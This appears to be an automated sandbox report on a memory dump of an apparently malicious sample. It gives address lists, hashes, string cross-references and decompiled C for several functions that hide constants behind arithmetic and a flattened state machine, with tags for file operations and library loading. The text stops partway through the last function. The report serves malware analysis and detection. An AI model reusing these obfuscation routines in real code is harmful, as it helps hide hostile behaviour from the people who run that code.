0x00240465
0x0024046d
0x00240475
0x00240485
0x00240489
0x00240496
0x00240499
0x0024049d
0x002404a5
0x002404b2
0x002404b6
0x002404be
0x002404c6
0x002404ce
0x002404d6
0x002404db
0x002404e3
0x002404eb
0x002404fb
0x002404ff
0x00240504
0x0024050c
0x00240514
0x0024051c
0x00240524
0x0024052c
0x00240534
0x0024053c
0x00240549
0x0024054c
0x00240550
0x00240554
0x0024055c
0x00240564
0x00240569
0x00240571
0x00240579
0x0024057d
0x0024058a
0x0024058e
0x00240596
0x0024059e
0x002405a6
0x002405ae
0x002405b6
0x002405ba
0x002405bb
0x002405bd
0x002405c1
0x002405c9
0x002405c9
0x002405d7
0x002406f4
0x002406fd
0x00240708
0x0024070f
0x00240711
0x00240713
0x00240719
0x0024071b
0x0024071b
0x00240715
0x00240715
0x00240717
0x00000000
0x00000000
0x00240717
0x00240713
0x002405dd
0x002405e3
0x0024068a
0x0024068e
0x00240692
0x00240697
0x0024069a
0x00000000
0x002405e9
0x002405ef
0x0024065f
0x00240663
0x00240668
0x0024066a
0x0024066d
0x00240670
0x00240676
0x00000000
0x00240676
0x002405f1
0x002405f7
0x00240610
0x0024061b
0x00240621
0x00240622
0x00240624
0x0024062a
0x00000000
0x0024062a
0x002405f9
0x002405ff
0x00000000
0x00240605
0x00240605
0x00000000
0x00240605
0x002405ff
0x002405f7
0x002405ef
0x002405e3
0x0024071f
0x00240728
0x00240728
0x002406a4
0x002406be
0x002406c3
0x002406c9
0x002406d0
0x002406d8
0x002406d8
0x002406de
0x002406e3
0x002406e6
0x002406e6
0x002406e6
0x00000000

Strings

Fj, xrefs: 002404CE
Sq, xrefs: 002404A5
#,', xrefs: 002402DB
#, xrefs: 00240373
[, xrefs: 002403FE
u^, xrefs: 00240347

Memory Dump Source

Source File: 00000007.00000002.2111086691.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.2111061429.0000000000230000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2111135016.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: #,'$#$Fj$Sq$[$u^
API String ID: 0-3347335214
Opcode ID: c47c2e617af9f90d504ce4957d9b81ea9ce1d44935f169193b34d947923a3a8b
Instruction ID: f82053fcdca83c1f7aaa8d7c4eec6ba2f78566a670e4129313a4909c3cb049fd
Opcode Fuzzy Hash: c47c2e617af9f90d504ce4957d9b81ea9ce1d44935f169193b34d947923a3a8b
Instruction Fuzzy Hash: DEB153725183819FE358CF64C88940BFBE2FBC4758F108A1DF1865A2A0D7B59A59CF83

Uniqueness

Uniqueness Score: -1.00%

Function 0023EE78, Relevance: 5.2, Strings: 4, Instructions: 203
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E0023EE78() {
				char _v520;
				char _v1040;
				intOrPtr _v1044;
				intOrPtr _v1048;
				intOrPtr _v1052;
				intOrPtr _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				void* _t204;
				void* _t216;
				void* _t218;
				intOrPtr _t242;
				intOrPtr _t248;
				signed int _t249;
				signed int _t250;
				signed int _t251;
				signed int _t252;
				signed int _t253;
				signed int _t254;
				signed int* _t257;

				_t257 =  &_v1124;
				_v1056 = 0x181c5d;
				_v1052 = 0x367784;
				_t216 = 0x1144238d;
				_v1048 = 0x4ffcf6;
				_t248 = 0;
				_v1044 = 0;
				_v1088 = 0xda27;
				_t249 = 0x62;
				_v1088 = _v1088 * 0x3a;
				_t250 = 0x7a;
				_v1088 = _v1088 / _t249;
				_v1088 = _v1088 ^ 0x0000d2a1;
				_v1112 = 0x1719;
				_v1112 = _v1112 << 7;
				_v1112 = _v1112 + 0xffff2bf1;
				_v1112 = _v1112 | 0x98c770ba;
				_v1112 = _v1112 ^ 0x98cfba04;
				_v1096 = 0xeee5;
				_v1096 = _v1096 ^ 0xe08a058d;
				_v1096 = _v1096 | 0xf31efd60;
				_v1096 = _v1096 >> 0xd;
				_v1096 = _v1096 ^ 0x00079e87;
				_v1068 = 0x925f;
				_v1068 = _v1068 + 0xa627;
				_v1068 = _v1068 * 0xc;
				_v1068 = _v1068 ^ 0x000ee055;
				_v1076 = 0x1457;
				_v1076 = _v1076 * 0x3c;
				_t251 = 0x32;
				_v1076 = _v1076 / _t250;
				_v1076 = _v1076 ^ 0x00007f2a;
				_v1064 = 0x70c;
				_v1064 = _v1064 * 3;
				_v1064 = _v1064 ^ 0x000033a7;
				_v1080 = 0xbf13;
				_v1080 = _v1080 >> 0xf;
				_v1080 = _v1080 | 0xa6e1d279;
				_v1080 = _v1080 ^ 0xa6e18774;
				_v1072 = 0x855;
				_v1072 = _v1072 >> 6;
				_v1072 = _v1072 * 0x6d;
				_v1072 = _v1072 ^ 0x00004ced;
				_v1060 = 0x8e6f;
				_v1060 = _v1060 + 0xe76;
				_v1060 = _v1060 ^ 0x0000eeed;
				_v1116 = 0x7f13;
				_v1116 = _v1116 + 0x7bf9;
				_v1116 = _v1116 + 0xffffe522;
				_v1116 = _v1116 + 0x76b9;
				_v1116 = _v1116 ^ 0x000120a7;
				_v1124 = 0x4a8d;
				_v1124 = _v1124 + 0xb0fa;
				_t252 = 0x18;
				_v1124 = _v1124 / _t251;
				_v1124 = _v1124 ^ 0xe1689f92;
				_v1124 = _v1124 ^ 0xe168b829;
				_v1104 = 0x6fdc;
				_v1104 = _v1104 / _t252;
				_v1104 = _v1104 ^ 0xd1a01b12;
				_v1104 = _v1104 >> 0xd;
				_v1104 = _v1104 ^ 0x0006b7bc;
				_v1120 = 0x3441;
				_v1120 = _v1120 << 2;
				_v1120 = _v1120 | 0xb521b1d3;
				_v1120 = _v1120 ^ 0x6f352f49;
				_v1120 = _v1120 ^ 0xda14a570;
				_v1092 = 0xdaef;
				_v1092 = _v1092 + 0xffffef8f;
				_v1092 = _v1092 | 0x558b4159;
				_v1092 = _v1092 >> 0xb;
				_v1092 = _v1092 ^ 0x000a96bc;
				_v1084 = 0x9e65;
				_v1084 = _v1084 ^ 0xd37ef8f9;
				_t253 = 0x14;
				_v1084 = _v1084 / _t253;
				_v1084 = _v1084 ^ 0x0a9307fe;
				_v1100 = 0x36e3;
				_v1100 = _v1100 + 0xffff4219;
				_v1100 = _v1100 | 0x679c7357;
				_t254 = 0x3e;
				_v1100 = _v1100 * 0x7e;
				_v1100 = _v1100 ^ 0xffbf63c1;
				_v1108 = 0x25e;
				_v1108 = _v1108 / _t254;
				_v1108 = _v1108 | 0x82073b90;
				_v1108 = _v1108 * 0x30;
				_v1108 = _v1108 ^ 0x615b4461;
				do {
					while(_t216 != 0x295ca1) {
						if(_t216 == 0x1144238d) {
							_t216 = 0x274f9b22;
							continue;
						} else {
							if(_t216 == 0x1718f041) {
								E0023C0C6(_v1092, _v1084,  &_v1040, _v1100, _v1108); // executed
							} else {
								if(_t216 == 0x274f9b22) {
									E00243E3F(_t216,  &_v520, __eflags, _v1088, _v1112);
									_t216 = 0x295ca1;
									continue;
								} else {
									_t264 = _t216 - 0x3691f983;
									if(_t216 != 0x3691f983) {
										goto L10;
									} else {
										_push( &_v1040);
										_push( &_v520);
										E00237B63(_v1104, _v1120, _t264);
										_t248 =  !=  ? 1 : _t248;
										_t216 = 0x1718f041;
										continue;
									}
								}
							}
						}
						L13:
						return _t248;
					}
					_push(_v1068);
					_t204 = E0024889D(0x24c9b0, _v1096, __eflags);
					_pop(_t218);
					_t242 =  *0x24ca2c; // 0x5d8300
					_t176 = _t242 + 0x230; // 0x7a0056
					E0023C680(_t176, _v1064, _v1080, _t218, _v1072,  *0x24ca2c, _t204,  &_v1040);
					E00242025(_v1060, _t204, _v1116, _v1124);
					_t257 =  &(_t257[9]);
					_t216 = 0x3691f983;
					L10:
					__eflags = _t216 - 0x16e30c37;
				} while (__eflags != 0);
				goto L13;
			}

0x0023ee78
0x0023ee7e
0x0023ee88
0x0023ee90
0x0023ee95
0x0023eea1
0x0023eea3
0x0023eea7
0x0023eeb6
0x0023eeb9
0x0023eec3
0x0023eec4
0x0023eeca
0x0023eed2
0x0023eeda
0x0023eedf
0x0023eee7
0x0023eeef
0x0023eef7
0x0023eeff
0x0023ef07
0x0023ef0f
0x0023ef14
0x0023ef1c
0x0023ef24
0x0023ef33
0x0023ef37
0x0023ef3f
0x0023ef4c
0x0023ef56
0x0023ef57
0x0023ef5d
0x0023ef65
0x0023ef74
0x0023ef78
0x0023ef80
0x0023ef88
0x0023ef8d
0x0023ef95
0x0023ef9d
0x0023efa5
0x0023efaf
0x0023efb3
0x0023efbb
0x0023efc3
0x0023efcb
0x0023efd3
0x0023efdb
0x0023efe3
0x0023efeb
0x0023eff3
0x0023effb
0x0023f003
0x0023f011
0x0023f012
0x0023f016
0x0023f01e
0x0023f028
0x0023f038
0x0023f03e
0x0023f04b
0x0023f055
0x0023f05d
0x0023f065
0x0023f06a
0x0023f072
0x0023f07a
0x0023f082
0x0023f08a
0x0023f092
0x0023f09a
0x0023f09f
0x0023f0a7
0x0023f0af
0x0023f0bb
0x0023f0c0
0x0023f0c6
0x0023f0ce
0x0023f0d6
0x0023f0de
0x0023f0eb
0x0023f0ec
0x0023f0f0
0x0023f0f8
0x0023f106
0x0023f10a
0x0023f117
0x0023f11b
0x0023f123
0x0023f123
0x0023f12d
0x0023f190
0x00000000
0x0023f12f
0x0023f135
0x0023f215
0x0023f13b
0x0023f13d
0x0023f185
0x0023f18c
0x00000000
0x0023f13f
0x0023f13f
0x0023f145
0x00000000
0x0023f14b
0x0023f157
0x0023f15f
0x0023f160
0x0023f16c
0x0023f16f
0x00000000
0x0023f16f
0x0023f145
0x0023f13d
0x0023f135
0x0023f21d
0x0023f229
0x0023f229
0x0023f194
0x0023f1a1
0x0023f1a6
0x0023f1c2
0x0023f1cc
0x0023f1d2
0x0023f1e5
0x0023f1ea
0x0023f1ed
0x0023f1f2
0x0023f1f2
0x0023f1f2
0x00000000

Strings

6, xrefs: 0023F0CE
aD[a, xrefs: 0023F11B
I/5o, xrefs: 0023F072
L, xrefs: 0023EFB3

Memory Dump Source

Source File: 00000007.00000002.2111086691.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.2111061429.0000000000230000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2111135016.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: I/5o$aD[a$6$L
API String ID: 0-1330720659
Opcode ID: aa7f7d47efb36781e9dd6983fc65c55bd4f6dde0006c4e698a03cff8df4d7e47
Instruction ID: 2ef0a91d5a3fb8927a85014ae927d1be3af4e63ecd67e72e2ca2b4789b7b0513
Opcode Fuzzy Hash: aa7f7d47efb36781e9dd6983fc65c55bd4f6dde0006c4e698a03cff8df4d7e47
Instruction Fuzzy Hash: C19131B15183419FD358CF25D58941BFBF6BBC4358F10892EF19A9A260D3B98A19CF83

Uniqueness

Uniqueness Score: -1.00%

Function 00237B63, Relevance: 2.7, Strings: 2, Instructions: 187
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E00237B63(void* __ecx, void* __edx, void* __eflags) {
				void* _t227;
				signed int _t253;
				signed int _t257;
				signed int _t258;
				void* _t279;
				void* _t280;

				_t279 = _t280 - 0x70;
				_push( *((intOrPtr*)(_t279 + 0x7c)));
				_push( *((intOrPtr*)(_t279 + 0x78)));
				_push(__edx);
				_push(__ecx);
				E0023602B(_t227);
				 *(_t279 + 0x5c) = 0x4f49;
				 *(_t279 + 0x5c) =  *(_t279 + 0x5c) + 0xffff573d;
				 *(_t279 + 0x5c) =  *(_t279 + 0x5c) >> 0xe;
				 *(_t279 + 0x5c) =  *(_t279 + 0x5c) + 0xffff1f14;
				 *(_t279 + 0x5c) =  *(_t279 + 0x5c) ^ 0x00031f13;
				 *(_t279 + 0x20) = 0x2d3b;
				 *(_t279 + 0x20) =  *(_t279 + 0x20) << 0xa;
				 *(_t279 + 0x20) =  *(_t279 + 0x20) ^ 0x00b4ea14;
				 *(_t279 + 0x38) = 0xada;
				_t257 = 0x56;
				 *(_t279 + 0x38) =  *(_t279 + 0x38) * 0xd;
				 *(_t279 + 0x38) =  *(_t279 + 0x38) ^ 0x7978ee92;
				 *(_t279 + 0x38) =  *(_t279 + 0x38) ^ 0x79786b80;
				 *(_t279 + 0x44) = 0x9fd0;
				 *(_t279 + 0x44) =  *(_t279 + 0x44) << 0xd;
				 *(_t279 + 0x44) =  *(_t279 + 0x44) + 0xffff90c4;
				 *(_t279 + 0x44) =  *(_t279 + 0x44) ^ 0x13f99f58;
				 *(_t279 + 0x28) = 0xbdd8;
				 *(_t279 + 0x28) =  *(_t279 + 0x28) / _t257;
				 *(_t279 + 0x28) =  *(_t279 + 0x28) ^ 0x65272766;
				 *(_t279 + 0x28) =  *(_t279 + 0x28) ^ 0x65270fe8;
				 *(_t279 + 0x24) = 0xa469;
				 *(_t279 + 0x24) =  *(_t279 + 0x24) * 0x47;
				 *(_t279 + 0x24) =  *(_t279 + 0x24) ^ 0x002db229;
				 *(_t279 + 0x48) = 0xdd17;
				 *(_t279 + 0x48) =  *(_t279 + 0x48) << 4;
				 *(_t279 + 0x48) =  *(_t279 + 0x48) >> 9;
				 *(_t279 + 0x48) =  *(_t279 + 0x48) ^ 0x00005398;
				 *(_t279 + 0x3c) = 0x840;
				 *(_t279 + 0x3c) =  *(_t279 + 0x3c) ^ 0x7135c857;
				 *(_t279 + 0x3c) =  *(_t279 + 0x3c) + 0xffffaa29;
				 *(_t279 + 0x3c) =  *(_t279 + 0x3c) ^ 0x71355336;
				 *(_t279 + 0x34) = 0xe245;
				 *(_t279 + 0x34) =  *(_t279 + 0x34) ^ 0x5c1086b0;
				 *(_t279 + 0x34) =  *(_t279 + 0x34) << 0xc;
				 *(_t279 + 0x34) =  *(_t279 + 0x34) ^ 0x064f42a5;
				 *(_t279 + 0x68) = 0x7c59;
				 *(_t279 + 0x68) =  *(_t279 + 0x68) >> 7;
				 *(_t279 + 0x68) =  *(_t279 + 0x68) + 0xdfb1;
				 *(_t279 + 0x68) =  *(_t279 + 0x68) >> 1;
				 *(_t279 + 0x68) =  *(_t279 + 0x68) ^ 0x00006add;
				 *(_t279 + 0x1c) = 0x17b0;
				 *(_t279 + 0x1c) =  *(_t279 + 0x1c) * 0x33;
				 *(_t279 + 0x1c) =  *(_t279 + 0x1c) ^ 0x0004ea7a;
				 *(_t279 + 0xc) = 0x52de;
				 *(_t279 + 0xc) =  *(_t279 + 0xc) >> 3;
				 *(_t279 + 0xc) =  *(_t279 + 0xc) ^ 0x00000565;
				 *(_t279 + 0x14) = 0xa04a;
				 *(_t279 + 0x14) =  *(_t279 + 0x14) + 0x5b3d;
				 *(_t279 + 0x14) =  *(_t279 + 0x14) ^ 0x0000ad98;
				 *(_t279 + 0x10) = 0x88b9;
				 *(_t279 + 0x10) =  *(_t279 + 0x10) << 0xa;
				 *(_t279 + 0x10) =  *(_t279 + 0x10) ^ 0x0222fd12;
				 *(_t279 + 0x58) = 0x8451;
				 *(_t279 + 0x58) =  *(_t279 + 0x58) << 1;
				 *(_t279 + 0x58) =  *(_t279 + 0x58) + 0xffff44cb;
				 *(_t279 + 0x58) =  *(_t279 + 0x58) + 0xffff231f;
				 *(_t279 + 0x58) =  *(_t279 + 0x58) ^ 0xffff3ae7;
				 *(_t279 + 0x2c) = 0xa221;
				 *(_t279 + 0x2c) =  *(_t279 + 0x2c) << 0xe;
				 *(_t279 + 0x2c) =  *(_t279 + 0x2c) ^ 0x37ec24ae;
				 *(_t279 + 0x2c) =  *(_t279 + 0x2c) ^ 0x1f641a26;
				 *(_t279 + 0x6c) = 0xb834;
				 *(_t279 + 0x6c) =  *(_t279 + 0x6c) * 5;
				 *(_t279 + 0x6c) =  *(_t279 + 0x6c) + 0xff22;
				 *(_t279 + 0x6c) =  *(_t279 + 0x6c) + 0xffff2c65;
				 *(_t279 + 0x6c) =  *(_t279 + 0x6c) ^ 0x00038cf7;
				 *(_t279 + 0x60) = 0x6d71;
				 *(_t279 + 0x60) =  *(_t279 + 0x60) + 0xffff2e20;
				 *(_t279 + 0x60) =  *(_t279 + 0x60) << 0xa;
				 *(_t279 + 0x60) =  *(_t279 + 0x60) >> 7;
				 *(_t279 + 0x60) =  *(_t279 + 0x60) ^ 0x01fcf6fe;
				 *(_t279 + 0x40) = 0xcc9d;
				 *(_t279 + 0x40) =  *(_t279 + 0x40) << 1;
				 *(_t279 + 0x40) =  *(_t279 + 0x40) | 0xa720d145;
				 *(_t279 + 0x40) =  *(_t279 + 0x40) ^ 0xa721d74b;
				 *(_t279 + 0x50) = 0xea3;
				 *(_t279 + 0x50) =  *(_t279 + 0x50) + 0x27fa;
				 *(_t279 + 0x50) =  *(_t279 + 0x50) >> 7;
				 *(_t279 + 0x50) =  *(_t279 + 0x50) ^ 0x00000071;
				 *(_t279 + 0x64) = 0xe156;
				 *(_t279 + 0x64) =  *(_t279 + 0x64) + 0x8b10;
				_t258 = 0x77;
				 *(_t279 + 0x64) =  *(_t279 + 0x64) / _t258;
				 *(_t279 + 0x64) =  *(_t279 + 0x64) << 7;
				 *(_t279 + 0x64) =  *(_t279 + 0x64) ^ 0x0001fc91;
				 *(_t279 + 0x54) = 0xb949;
				 *(_t279 + 0x54) =  *(_t279 + 0x54) ^ 0xe8c9a038;
				 *(_t279 + 0x54) =  *(_t279 + 0x54) * 0x53;
				 *(_t279 + 0x54) =  *(_t279 + 0x54) * 0x46;
				 *(_t279 + 0x54) =  *(_t279 + 0x54) ^ 0x24032f8e;
				 *(_t279 + 0x4c) = 0x8c7e;
				 *(_t279 + 0x4c) =  *(_t279 + 0x4c) * 0x17;
				_t171 = _t279 - 0x14; // 0x68cf93e9
				 *(_t279 + 0x4c) =  *(_t279 + 0x4c) << 5;
				 *(_t279 + 0x4c) =  *(_t279 + 0x4c) ^ 0x0193ba3f;
				 *(_t279 + 0x30) = 0x8a4e;
				 *(_t279 + 0x30) =  *(_t279 + 0x30) << 0xc;
				 *(_t279 + 0x30) =  *(_t279 + 0x30) | 0xb22e72a5;
				 *(_t279 + 0x30) =  *(_t279 + 0x30) ^ 0xbaaee90f;
				 *(_t279 + 0x18) = 0x537b;
				 *(_t279 + 0x18) =  *(_t279 + 0x18) >> 0x10;
				 *(_t279 + 0x18) =  *(_t279 + 0x18) ^ 0x00002127;
				E002493A8( *(_t279 + 0x44),  *(_t279 + 0x28),  *(_t279 + 0x24), _t171, 0x1e,  *(_t279 + 0x48));
				_t193 = _t279 - 0x21c; // 0x68cf91e1
				E002493A8( *(_t279 + 0x3c),  *(_t279 + 0x34),  *(_t279 + 0x68), _t193, 0x208,  *(_t279 + 0x1c));
				_t198 = _t279 - 0x424; // 0x68cf8fd9
				E002493A8( *(_t279 + 0xc),  *(_t279 + 0x14),  *(_t279 + 0x10), _t198, 0x208,  *(_t279 + 0x58));
				_t202 = _t279 - 0x21c; // 0x68cf91e1
				E00236636(_t202,  *(_t279 + 0x2c),  *(_t279 + 0x6c),  *(_t279 + 0x60),  *((intOrPtr*)(_t279 + 0x78)));
				_t208 = _t279 - 0x424; // 0x68cf8fd9
				E00236636(_t208,  *(_t279 + 0x40),  *(_t279 + 0x50),  *(_t279 + 0x64),  *((intOrPtr*)(_t279 + 0x7c)));
				 *(_t279 - 0x10) =  *(_t279 + 0x5c);
				_t214 = _t279 - 0x14; // 0x68cf93e9
				_t215 = _t279 - 0x21c; // 0x68cf91e1
				 *((intOrPtr*)(_t279 - 0xc)) = _t215;
				_t217 = _t279 - 0x424; // 0x68cf8fd9
				 *((intOrPtr*)(_t279 - 8)) = _t217;
				 *((short*)(_t279 - 4)) =  *(_t279 + 0x38) |  *(_t279 + 0x20);
				_t253 = E00247BF4(_t214,  *(_t279 + 0x54),  *(_t279 + 0x4c),  *(_t279 + 0x30),  *(_t279 + 0x18)); // executed
				asm("sbb eax, eax");
				return  ~_t253 + 1;
			}

0x00237b64
0x00237b6f
0x00237b72
0x00237b75
0x00237b76
0x00237b77
0x00237b7c
0x00237b85
0x00237b8c
0x00237b90
0x00237b97
0x00237b9e
0x00237ba5
0x00237ba9
0x00237bb0
0x00237bbd
0x00237bbe
0x00237bc1
0x00237bc8
0x00237bcf
0x00237bd6
0x00237bda
0x00237be1
0x00237be8
0x00237bf4
0x00237bf7
0x00237bfe
0x00237c05
0x00237c10
0x00237c13
0x00237c1a
0x00237c21
0x00237c25
0x00237c29
0x00237c30
0x00237c37
0x00237c3e
0x00237c45
0x00237c4c
0x00237c53
0x00237c5a
0x00237c5e
0x00237c65
0x00237c6c
0x00237c70
0x00237c77
0x00237c7a
0x00237c81
0x00237c8c
0x00237c8f
0x00237c96
0x00237c9d
0x00237ca1
0x00237ca8
0x00237caf
0x00237cb6
0x00237cbd
0x00237cc4
0x00237cc8
0x00237ccf
0x00237cd6
0x00237cd9
0x00237ce0
0x00237ce7
0x00237cee
0x00237cf5
0x00237cf9
0x00237d00
0x00237d07
0x00237d12
0x00237d15
0x00237d1c
0x00237d23
0x00237d2a
0x00237d33
0x00237d3a
0x00237d3e
0x00237d42
0x00237d49
0x00237d50
0x00237d53
0x00237d5a
0x00237d61
0x00237d68
0x00237d6f
0x00237d73
0x00237d77
0x00237d7e
0x00237d8a
0x00237d8d
0x00237d90
0x00237d94
0x00237d9b
0x00237da2
0x00237dad
0x00237db4
0x00237db7
0x00237dbe
0x00237dc9
0x00237dcc
0x00237dcf
0x00237dd3
0x00237dda
0x00237de1
0x00237de5
0x00237dec
0x00237df3
0x00237dfa
0x00237dfe
0x00237e14
0x00237e21
0x00237e32
0x00237e3a
0x00237e4b
0x00237e53
0x00237e65
0x00237e6d
0x00237e7c
0x00237e84
0x00237e87
0x00237e8a
0x00237e90
0x00237e93
0x00237e99
0x00237ea5
0x00237eb2
0x00237ebc
0x00237ec4

Strings

f''e, xrefs: 00237BF7
6S5q, xrefs: 00237C45

Memory Dump Source

Source File: 00000007.00000002.2111086691.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.2111061429.0000000000230000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2111135016.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: FileOperation
String ID: 6S5q$f''e
API String ID: 3080627654-2864536462
Opcode ID: 36b9ea7229c61bbd42b1c058f75f695ac5583f6220406a17043b82f58b666b25
Instruction ID: 93ea29863e2991b4071ee83a6b47056cd45020bb154e315fc6b5f52d9e169b23
Opcode Fuzzy Hash: 36b9ea7229c61bbd42b1c058f75f695ac5583f6220406a17043b82f58b666b25
Instruction Fuzzy Hash: 9EA1CFB140134D9BEF59CF61C9898CE3BB5BF04358F508119FD2A962A0D3BAD959CF81

Uniqueness

Uniqueness Score: -1.00%

Function 0023B41F, Relevance: 2.6, Strings: 2, Instructions: 76
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E0023B41F(signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _t91;
				signed int* _t93;
				intOrPtr _t95;
				signed int _t103;
				signed int _t104;

				_v44 = _v44 & 0x00000000;
				_v48 = 0x783c80;
				_v8 = 0x978d;
				_v8 = _v8 >> 8;
				_v8 = _v8 >> 5;
				_v8 = _v8 | 0x918d7e28;
				_v8 = _v8 ^ 0x918d7bef;
				_v28 = 0x8ae6;
				_v28 = _v28 + 0xffff2048;
				_v28 = _v28 ^ 0xfffff0f4;
				_v40 = 0x90b0;
				_v40 = _v40 + 0x186c;
				_v40 = _v40 ^ 0x0000e60c;
				_v12 = 0x4bc7;
				_t103 = __edx;
				_v12 = _v12 * 0x77;
				_v12 = _v12 >> 8;
				_v12 = _v12 << 3;
				_v12 = _v12 ^ 0x000165a0;
				_v36 = 0x87ea;
				_v36 = _v36 | 0x75974cd4;
				_v36 = _v36 ^ 0x75979443;
				_v32 = 0x7f4c;
				_v32 = _v32 ^ 0x8971dc13;
				_v32 = _v32 ^ 0x89718547;
				_v24 = 0xd36b;
				_t104 = 0x3c;
				_v24 = _v24 * 9;
				_v24 = _v24 << 1;
				_v24 = _v24 >> 5;
				_v24 = _v24 ^ 0x000045e9;
				_v20 = 0xf34d;
				_v20 = _v20 + 0x5309;
				_v20 = _v20 << 0xa;
				_v20 = _v20 | 0x23e3e3ea;
				_v20 = _v20 ^ 0x27fbee67;
				_v16 = 0xef72;
				_v16 = _v16 * 0x55;
				_v16 = _v16 << 0x10;
				_v16 = _v16 / _t104;
				_v16 = _v16 ^ 0x0225d37d;
				_push(_v28);
				_t91 = E00231000(_v40, _v12, _v36, _v32, E0024889D(_t93, _v8, _v16));
				_t95 =  *0x24ca28; // 0x5c3138
				 *((intOrPtr*)(_t95 + 0x1c + _t103 * 4)) = _t91;
				return E00242025(_v24, _t90, _v20, _v16);
			}

0x0023b425
0x0023b429
0x0023b430
0x0023b437
0x0023b43b
0x0023b43f
0x0023b446
0x0023b44d
0x0023b454
0x0023b45b
0x0023b462
0x0023b469
0x0023b470
0x0023b477
0x0023b484
0x0023b48a
0x0023b48d
0x0023b491
0x0023b495
0x0023b49c
0x0023b4a3
0x0023b4aa
0x0023b4b1
0x0023b4b8
0x0023b4bf
0x0023b4c6
0x0023b4d1
0x0023b4d2
0x0023b4d5
0x0023b4d8
0x0023b4dc
0x0023b4e3
0x0023b4ea
0x0023b4f1
0x0023b4f5
0x0023b4fc
0x0023b503
0x0023b50e
0x0023b511
0x0023b51a
0x0023b51d
0x0023b524
0x0023b53e
0x0023b543
0x0023b551
0x0023b565

Strings

#, xrefs: 0023B4F5
81\, xrefs: 0023B543

Memory Dump Source

Source File: 00000007.00000002.2111086691.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.2111061429.0000000000230000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2111135016.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: LibraryLoad
String ID: 81\$#
API String ID: 1029625771-3306788046
Opcode ID: b4b1551517829ee76a5dad8bcea7f9b90a5560f2cb7bcef6a79452c07fa69c98
Instruction ID: 421291b48f5595a3ab998cd674b33172bfb53483b9bc83e09fbfcd0e7c04ad23
Opcode Fuzzy Hash: b4b1551517829ee76a5dad8bcea7f9b90a5560f2cb7bcef6a79452c07fa69c98
Instruction Fuzzy Hash: 2241EF71C0121AEBDF08CFA5C94A4EEFBB1FB54318F208599D411B62A4D7B90B58CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0023568E, Relevance: 1.4, Strings: 1, Instructions: 184
COMMONCrypto

Download Yara Rule

C-Code - Quality: 84%

			E0023568E(void* __ecx, void* __edx) {
				void* _t188;
				void* _t209;
				void* _t210;
				signed int _t215;
				signed int _t216;
				signed int _t217;
				signed int _t218;
				signed int _t219;
				intOrPtr _t242;
				void* _t245;
				void* _t248;
				void* _t249;

				_t248 = _t249 - 0x5c;
				_t242 =  *((intOrPtr*)(_t248 + 0x6c));
				_t245 = __edx;
				_push(0);
				_push( *((intOrPtr*)(_t248 + 0x78)));
				_push( *((intOrPtr*)(_t248 + 0x74)));
				_push( *((intOrPtr*)(_t248 + 0x70)));
				_push(_t242);
				_push( *((intOrPtr*)(_t248 + 0x68)));
				_push( *((intOrPtr*)(_t248 + 0x64)));
				_push(__edx);
				_push(__ecx);
				E0023602B(_t188);
				 *(_t248 + 0x38) = 0xda0c;
				 *(_t248 + 0x38) =  *(_t248 + 0x38) << 7;
				_t215 = 0x75;
				 *(_t248 + 0x38) =  *(_t248 + 0x38) * 0x59;
				 *(_t248 + 0x38) =  *(_t248 + 0x38) ^ 0x25e734ff;
				 *(_t248 + 0x54) = 0xb39d;
				 *(_t248 + 0x54) =  *(_t248 + 0x54) << 6;
				 *(_t248 + 0x54) =  *(_t248 + 0x54) | 0xca3cae0f;
				 *(_t248 + 0x54) =  *(_t248 + 0x54) * 0xe;
				 *(_t248 + 0x54) =  *(_t248 + 0x54) ^ 0x0f551016;
				 *(_t248 + 0x1c) = 0x5da7;
				 *(_t248 + 0x1c) =  *(_t248 + 0x1c) ^ 0x52b401ed;
				 *(_t248 + 0x1c) =  *(_t248 + 0x1c) / _t215;
				 *(_t248 + 0x1c) =  *(_t248 + 0x1c) ^ 0x00b496a1;
				 *(_t248 + 0x30) = 0xba31;
				_t216 = 0x2c;
				 *(_t248 + 0x30) =  *(_t248 + 0x30) / _t216;
				 *(_t248 + 0x30) =  *(_t248 + 0x30) | 0x346b3718;
				 *(_t248 + 0x30) =  *(_t248 + 0x30) ^ 0x346b13e9;
				 *(_t248 + 0x2c) = 0x6402;
				_t217 = 0x3f;
				 *(_t248 + 0x2c) =  *(_t248 + 0x2c) * 0x14;
				 *(_t248 + 0x2c) =  *(_t248 + 0x2c) >> 2;
				 *(_t248 + 0x2c) =  *(_t248 + 0x2c) ^ 0x0001cbcb;
				 *(_t248 + 0x34) = 0x3e45;
				 *(_t248 + 0x34) =  *(_t248 + 0x34) << 0xb;
				 *(_t248 + 0x34) =  *(_t248 + 0x34) >> 2;
				 *(_t248 + 0x34) =  *(_t248 + 0x34) ^ 0x007ce60c;
				 *(_t248 + 0x3c) = 0xfd38;
				 *(_t248 + 0x3c) =  *(_t248 + 0x3c) + 0xffffe888;
				 *(_t248 + 0x3c) =  *(_t248 + 0x3c) * 0x69;
